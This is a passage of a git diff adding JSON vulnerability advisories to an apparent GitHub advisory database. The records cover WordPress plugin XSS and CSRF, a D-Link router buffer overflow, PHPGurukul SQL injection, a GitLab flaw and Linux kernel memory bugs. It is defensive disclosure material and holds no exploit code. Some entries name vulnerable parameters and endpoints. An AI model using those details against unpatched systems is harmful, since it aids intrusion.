"https://www.wordfence.com/threat-intel/vulnerabilities/id/c8c60701-37f0-4404-b965-9136ac456e38?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h7p2-xjmg-5hqg/GHSA-h7p2-xjmg-5hqg.json b/advisories/unreviewed/2025/07/GHSA-h7p2-xjmg-5hqg/GHSA-h7p2-xjmg-5hqg.json new file mode 100644 index 0000000000000..16d49e65942bb --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h7p2-xjmg-5hqg/GHSA-h7p2-xjmg-5hqg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7p2-xjmg-5hqg", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-7690" + ], + "details": "The Affiliate Plus plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.2. This is due to missing or incorrect nonce validation on the 'affiplus_settings' page. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7690" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/affiliate-plus/trunk/affiplus.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/affiliate-plus/trunk/affipsettings.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/affiliate-plus" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3fc6230-043f-4079-a82a-1b5d191dbf7d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h9m7-cj39-6vrg/GHSA-h9m7-cj39-6vrg.json b/advisories/unreviewed/2025/07/GHSA-h9m7-cj39-6vrg/GHSA-h9m7-cj39-6vrg.json new file mode 100644 index 0000000000000..9b510cb7ae023 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h9m7-cj39-6vrg/GHSA-h9m7-cj39-6vrg.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h9m7-cj39-6vrg", + "modified": "2025-07-25T15:30:55Z", + "published": "2025-07-25T15:30:55Z", + "aliases": [ + "CVE-2025-8159" + ], + "details": "A vulnerability was found in D-Link DIR-513 1.0. It has been rated as critical. This issue affects the function formLanguageChange of the file /goform/formLanguageChange of the component HTTP POST Request Handler. The manipulation of the argument curTime leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8159" + }, + { + "type": "WEB", + "url": "https://github.com/boyslikesports/vul/blob/main/formLanguageChange.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317573" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317573" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620604" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hcf7-cj24-hf8m/GHSA-hcf7-cj24-hf8m.json b/advisories/unreviewed/2025/07/GHSA-hcf7-cj24-hf8m/GHSA-hcf7-cj24-hf8m.json new file mode 100644 index 0000000000000..31e9880a1ac18 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hcf7-cj24-hf8m/GHSA-hcf7-cj24-hf8m.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hcf7-cj24-hf8m", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38410" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm: Fix a fence leak in submit error path\n\nIn error paths, we could unref the submit without calling\ndrm_sched_entity_push_job(), so msm_job_free() will never get\ncalled. Since drm_sched_job_cleanup() will NULL out the\ns_fence, we can use that to detect this case.\n\nPatchwork: https://patchwork.freedesktop.org/patch/653584/", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38410" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0dc817f852e5f8ec8501d19ef7dcc01affa181d0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0eaa495b3d5710e5ba72051d2e01bb28292c625c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/201eba5c9652a900c0b248070263f9acd3735689" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5d319f75ccf7f0927425a7545aa1a22b3eedc189" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5deab0fa6cfd0cd7def17598db15ceb84f950584" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/fe2695b2f63bd77e0e03bc0fc779164115bb4699" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hv89-cw42-xpf3/GHSA-hv89-cw42-xpf3.json b/advisories/unreviewed/2025/07/GHSA-hv89-cw42-xpf3/GHSA-hv89-cw42-xpf3.json new file mode 100644 index 0000000000000..421d6b2c9ee64 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hv89-cw42-xpf3/GHSA-hv89-cw42-xpf3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hv89-cw42-xpf3", + "modified": "2025-07-25T15:30:41Z", + "published": "2025-07-25T15:30:41Z", + "aliases": [ + "CVE-2025-0765" + ], + "details": "An issue has been discovered in GitLab CE/EE affecting all versions from 17.9 before 18.0.5, 18.1 before 18.1.3, and 18.2 before 18.2.1 that could have allowed an unauthorized user to access custom service desk email addresses.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0765" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/2956315" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/515381" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T07:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hxvp-23fc-849f/GHSA-hxvp-23fc-849f.json b/advisories/unreviewed/2025/07/GHSA-hxvp-23fc-849f/GHSA-hxvp-23fc-849f.json new file mode 100644 index 0000000000000..543ef624df3a0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hxvp-23fc-849f/GHSA-hxvp-23fc-849f.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hxvp-23fc-849f", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38390" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: arm_ffa: Fix memory leak by freeing notifier callback node\n\nCommit e0573444edbf (\"firmware: arm_ffa: Add interfaces to request\nnotification callbacks\") adds support for notifier callbacks by allocating\nand inserting a callback node into a hashtable during registration of\nnotifiers. However, during unregistration, the code only removes the\nnode from the hashtable without freeing the associated memory, resulting\nin a memory leak.\n\nResolve the memory leak issue by ensuring the allocated notifier callback\nnode is properly freed after it is removed from the hashtable entry.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38390" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/076fa20b4f5737c34921dbb152f9efceaee571b2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/938827c440564b2cf2f9b804d1fe81ce8267eded" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a833d31ad867103ba72a0b73f3606f4ab8601719" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j3rr-hppv-g55q/GHSA-j3rr-hppv-g55q.json b/advisories/unreviewed/2025/07/GHSA-j3rr-hppv-g55q/GHSA-j3rr-hppv-g55q.json new file mode 100644 index 0000000000000..f95c196b81727 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j3rr-hppv-g55q/GHSA-j3rr-hppv-g55q.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j3rr-hppv-g55q", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38415" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nSquashfs: check return result of sb_min_blocksize\n\nSyzkaller reports an \"UBSAN: shift-out-of-bounds in squashfs_bio_read\" bug.\n\nSyzkaller forks multiple processes which after mounting the Squashfs\nfilesystem, issues an ioctl(\"/dev/loop0\", LOOP_SET_BLOCK_SIZE, 0x8000). \nNow if this ioctl occurs at the same time another process is in the\nprocess of mounting a Squashfs filesystem on /dev/loop0, the failure\noccurs. When this happens the following code in squashfs_fill_super()\nfails.\n\n----\nmsblk->devblksize = sb_min_blocksize(sb, SQUASHFS_DEVBLK_SIZE);\nmsblk->devblksize_log2 = ffz(~msblk->devblksize);\n----\n\nsb_min_blocksize() returns 0, which means msblk->devblksize is set to 0.\n\nAs a result, ffz(~msblk->devblksize) returns 64, and msblk->devblksize_log2\nis set to 64.\n\nThis subsequently causes the\n\nUBSAN: shift-out-of-bounds in fs/squashfs/block.c:195:36\nshift exponent 64 is too large for 64-bit type 'u64' (aka\n'unsigned long long')\n\nThis commit adds a check for a 0 return by sb_min_blocksize().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38415" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0aff95d9bc7fb5400ca8af507429c4b067bdb425" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/295ab18c2dbce8d0ac6ecf7c5187e16e1ac8b282" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4f99357dadbf9c979ad737156ad4c37fadf7c56b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/549f9e3d7b60d53808c98b9fde49b4f46d0524a5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5c51aa862cbeed2f3887f0382a2708956710bd68" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6abf6b78c6fb112eee495f5636ffcc350dd2ce25" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/734aa85390ea693bb7eaf2240623d41b03705c84" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/db7096ea160e40d78c67fce52e7cc51bde049497" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j523-44v9-5g5c/GHSA-j523-44v9-5g5c.json b/advisories/unreviewed/2025/07/GHSA-j523-44v9-5g5c/GHSA-j523-44v9-5g5c.json new file mode 100644 index 0000000000000..61d7c9d7feb0d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j523-44v9-5g5c/GHSA-j523-44v9-5g5c.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j523-44v9-5g5c", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38386" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Refuse to evaluate a method if arguments are missing\n\nAs reported in [1], a platform firmware update that increased the number\nof method parameters and forgot to update a least one of its callers,\ncaused ACPICA to crash due to use-after-free.\n\nSince this a result of a clear AML issue that arguably cannot be fixed\nup by the interpreter (it cannot produce missing data out of thin air),\naddress it by making ACPICA refuse to evaluate a method if the caller\nattempts to pass fewer arguments than expected to it.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38386" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/18ff4ed6a33a7e3f2097710eacc96bea7696e803" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2219e49857ffd6aea1b1ca5214d3270f84623a16" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4305d936abde795c2ef6ba916de8f00a50f64d2d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6fcab2791543924d438e7fa49276d0998b0a069f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ab1e8491c19eb2ea0fda81ef28e841c7cb6399f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b49d224d1830c46e20adce2a239c454cdab426f1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c9e4da550ae196132b990bd77ed3d8f2d9747f87" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d547779e72cea9865b732cd45393c4cd02b3598e" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j52g-6623-6m5j/GHSA-j52g-6623-6m5j.json b/advisories/unreviewed/2025/07/GHSA-j52g-6623-6m5j/GHSA-j52g-6623-6m5j.json new file mode 100644 index 0000000000000..77d0ed248b82d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j52g-6623-6m5j/GHSA-j52g-6623-6m5j.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j52g-6623-6m5j", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-8156" + ], + "details": "A vulnerability was found in PHPGurukul User Registration & Login and User Management 3.3 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/lastsevendays-reg-users.php. The manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8156" + }, + { + "type": "WEB", + "url": "https://github.com/secfake/mycve/issues/1" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317570" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317570" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j6m8-x4v6-3fgh/GHSA-j6m8-x4v6-3fgh.json b/advisories/unreviewed/2025/07/GHSA-j6m8-x4v6-3fgh/GHSA-j6m8-x4v6-3fgh.json new file mode 100644 index 0000000000000..1c5b94c985b5d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j6m8-x4v6-3fgh/GHSA-j6m8-x4v6-3fgh.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6m8-x4v6-3fgh", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38378" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: appletb-kbd: fix slab use-after-free bug in appletb_kbd_probe\n\nIn probe appletb_kbd_probe() a \"struct appletb_kbd *kbd\" is allocated\nvia devm_kzalloc() to store touch bar keyboard related data.\nLater on if backlight_device_get_by_name() finds a backlight device\nwith name \"appletb_backlight\" a timer (kbd->inactivity_timer) is setup\nwith appletb_inactivity_timer() and the timer is armed to run after\nappletb_tb_dim_timeout (60) seconds.\n\nA use-after-free is triggered when failure occurs after the timer is\narmed. This ultimately means probe failure occurs and as a result the\n\"struct appletb_kbd *kbd\" which is device managed memory is freed.\nAfter 60 seconds the timer will have expired and __run_timers will\nattempt to access the timer (kbd->inactivity_timer) however the kdb\nstructure has been freed causing a use-after free.\n\n[ 71.636938] ==================================================================\n[ 71.637915] BUG: KASAN: slab-use-after-free in __run_timers+0x7ad/0x890\n[ 71.637915] Write of size 8 at addr ffff8881178c5958 by task swapper/1/0\n[ 71.637915]\n[ 71.637915] CPU: 1 UID: 0 PID: 0 Comm: swapper/1 Not tainted 6.16.0-rc2-00318-g739a6c93cc75-dirty #12 PREEMPT(voluntary)\n[ 71.637915] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\n[ 71.637915] Call Trace:\n[ 71.637915] \n[ 71.637915] dump_stack_lvl+0x53/0x70\n[ 71.637915] print_report+0xce/0x670\n[ 71.637915] ? __run_timers+0x7ad/0x890\n[ 71.637915] kasan_report+0xce/0x100\n[ 71.637915] ? __run_timers+0x7ad/0x890\n[ 71.637915] __run_timers+0x7ad/0x890\n[ 71.637915] ? __pfx___run_timers+0x10/0x10\n[ 71.637915] ? update_process_times+0xfc/0x190\n[ 71.637915] ? __pfx_update_process_times+0x10/0x10\n[ 71.637915] ? _raw_spin_lock_irq+0x80/0xe0\n[ 71.637915] ? _raw_spin_lock_irq+0x80/0xe0\n[ 71.637915] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 71.637915] run_timer_softirq+0x141/0x240\n[ 71.637915] ? __pfx_run_timer_softirq+0x10/0x10\n[ 71.637915] ? __pfx___hrtimer_run_queues+0x10/0x10\n[ 71.637915] ? kvm_clock_get_cycles+0x18/0x30\n[ 71.637915] ? ktime_get+0x60/0x140\n[ 71.637915] handle_softirqs+0x1b8/0x5c0\n[ 71.637915] ? __pfx_handle_softirqs+0x10/0x10\n[ 71.637915] irq_exit_rcu+0xaf/0xe0\n[ 71.637915] sysvec_apic_timer_interrupt+0x6c/0x80\n[ 71.637915] \n[ 71.637915]\n[ 71.637915] Allocated by task 39:\n[ 71.637915] kasan_save_stack+0x33/0x60\n[ 71.637915] kasan_save_track+0x14/0x30\n[ 71.637915] __kasan_kmalloc+0x8f/0xa0\n[ 71.637915] __kmalloc_node_track_caller_noprof+0x195/0x420\n[ 71.637915] devm_kmalloc+0x74/0x1e0\n[ 71.637915] appletb_kbd_probe+0x37/0x3c0\n[ 71.637915] hid_device_probe+0x2d1/0x680\n[ 71.637915] really_probe+0x1c3/0x690\n[ 71.637915] __driver_probe_device+0x247/0x300\n[ 71.637915] driver_probe_device+0x49/0x210\n[...]\n[ 71.637915]\n[ 71.637915] Freed by task 39:\n[ 71.637915] kasan_save_stack+0x33/0x60\n[ 71.637915] kasan_save_track+0x14/0x30\n[ 71.637915] kasan_save_free_info+0x3b/0x60\n[ 71.637915] __kasan_slab_free+0x37/0x50\n[ 71.637915] kfree+0xcf/0x360\n[ 71.637915] devres_release_group+0x1f8/0x3c0\n[ 71.637915] hid_device_probe+0x315/0x680\n[ 71.637915] really_probe+0x1c3/0x690\n[ 71.637915] __driver_probe_device+0x247/0x300\n[ 71.637915] driver_probe_device+0x49/0x210\n[...]\n\nThe root cause of the issue is that the timer is not disarmed\non failure paths leading to it remaining active and accessing\nfreed memory. To fix this call timer_delete_sync() to deactivate\nthe timer.\n\nAnother small issue is that timer_delete_sync is called\nunconditionally in appletb_kbd_remove(), fix this by checking\nfor a valid kbd->backlight_dev before calling timer_delete_sync.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38378" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/38224c472a038fa9ccd4085511dd9f3d6119dbf9" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/51720dee3a61ebace36c3dcdd0b4a488e0970f29" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jp65-2h7q-qfg7/GHSA-jp65-2h7q-qfg7.json b/advisories/unreviewed/2025/07/GHSA-jp65-2h7q-qfg7/GHSA-jp65-2h7q-qfg7.json index 19b3f4edade8f..d542504e4be12 100644 --- a/advisories/unreviewed/2025/07/GHSA-jp65-2h7q-qfg7/GHSA-jp65-2h7q-qfg7.json +++ b/advisories/unreviewed/2025/07/GHSA-jp65-2h7q-qfg7/GHSA-jp65-2h7q-qfg7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jp65-2h7q-qfg7", - "modified": "2025-07-23T21:36:45Z", + "modified": "2025-07-25T15:30:38Z", "published": "2025-07-23T12:30:25Z", "aliases": [ "CVE-2025-53882" diff --git a/advisories/unreviewed/2025/07/GHSA-jqw7-w6rm-7cv4/GHSA-jqw7-w6rm-7cv4.json b/advisories/unreviewed/2025/07/GHSA-jqw7-w6rm-7cv4/GHSA-jqw7-w6rm-7cv4.json new file mode 100644 index 0000000000000..86366badbedc6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jqw7-w6rm-7cv4/GHSA-jqw7-w6rm-7cv4.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jqw7-w6rm-7cv4", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38418" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nremoteproc: core: Release rproc->clean_table after rproc_attach() fails\n\nWhen rproc->state = RPROC_DETACHED is attached to remote processor\nthrough rproc_attach(), if rproc_handle_resources() returns failure,\nthen the clean table should be released, otherwise the following\nmemory leak will occur.\n\nunreferenced object 0xffff000086a99800 (size 1024):\ncomm \"kworker/u12:3\", pid 59, jiffies 4294893670 (age 121.140s)\nhex dump (first 32 bytes):\n00 00 00 00 00 80 00 00 00 00 00 00 00 00 10 00 ............\n00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 ............\nbacktrace:\n [<000000008bbe4ca8>] slab_post_alloc_hook+0x98/0x3fc\n [<000000003b8a272b>] __kmem_cache_alloc_node+0x13c/0x230\n [<000000007a507c51>] __kmalloc_node_track_caller+0x5c/0x260\n [<0000000037818dae>] kmemdup+0x34/0x60\n [<00000000610f7f57>] rproc_boot+0x35c/0x56c\n [<0000000065f8871a>] rproc_add+0x124/0x17c\n [<00000000497416ee>] imx_rproc_probe+0x4ec/0x5d4\n [<000000003bcaa37d>] platform_probe+0x68/0xd8\n [<00000000771577f9>] really_probe+0x110/0x27c\n [<00000000531fea59>] __driver_probe_device+0x78/0x12c\n [<0000000080036a04>] driver_probe_device+0x3c/0x118\n [<000000007e0bddcb>] __device_attach_driver+0xb8/0xf8\n [<000000000cf1fa33>] bus_for_each_drv+0x84/0xe4\n [<000000001a53b53e>] __device_attach+0xfc/0x18c\n [<00000000d1a2a32c>] device_initial_probe+0x14/0x20\n [<00000000d8f8b7ae>] bus_probe_device+0xb0/0xb4\n unreferenced object 0xffff0000864c9690 (size 16):", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38418" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3562c09feeb8d8e9d102ce6840e8c7d57a7feb5c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3ee979709e16a83b257bc9a544a7ff71fd445ea9" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6fe9486d709e4a60990843832501ef6556440ca7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bcd241230fdbc6005230f80a4f8646ff5a84f15b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bf876fd9dc2d0c9fff96aef63d4346719f206fc1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f4ef928ca504c996f9222eb2c59ac6d6eefd9c75" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jwq8-f89h-rf2h/GHSA-jwq8-f89h-rf2h.json b/advisories/unreviewed/2025/07/GHSA-jwq8-f89h-rf2h/GHSA-jwq8-f89h-rf2h.json new file mode 100644 index 0000000000000..7426d8190151f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jwq8-f89h-rf2h/GHSA-jwq8-f89h-rf2h.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jwq8-f89h-rf2h", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-5084" + ], + "details": "The Post Grid Master plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘argsArray['read_more_text']’ parameter in all versions up to, and including, 3.4.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5084" + }, + { + "type": "WEB", + "url": "https://github.com/Fr1t0viski/PoCs/blob/main/XSS_GridMaster" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ajax-filter-posts/tags/3.4.13/inc/functions.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/ajax-filter-posts/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/08137a9e-6e4d-4ca6-954e-e98a44b0c9be?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-m2wh-w7w6-m2cj/GHSA-m2wh-w7w6-m2cj.json b/advisories/unreviewed/2025/07/GHSA-m2wh-w7w6-m2cj/GHSA-m2wh-w7w6-m2cj.json new file mode 100644 index 0000000000000..39aa1a0fd27ee --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-m2wh-w7w6-m2cj/GHSA-m2wh-w7w6-m2cj.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m2wh-w7w6-m2cj", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38362" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Add null pointer check for get_first_active_display()\n\nThe function mod_hdcp_hdcp1_enable_encryption() calls the function\nget_first_active_display(), but does not check its return value.\nThe return value is a null pointer if the display list is empty.\nThis will lead to a null pointer dereference in\nmod_hdcp_hdcp2_enable_encryption().\n\nAdd a null pointer check for get_first_active_display() and return\nMOD_HDCP_STATUS_DISPLAY_NOT_FOUND if 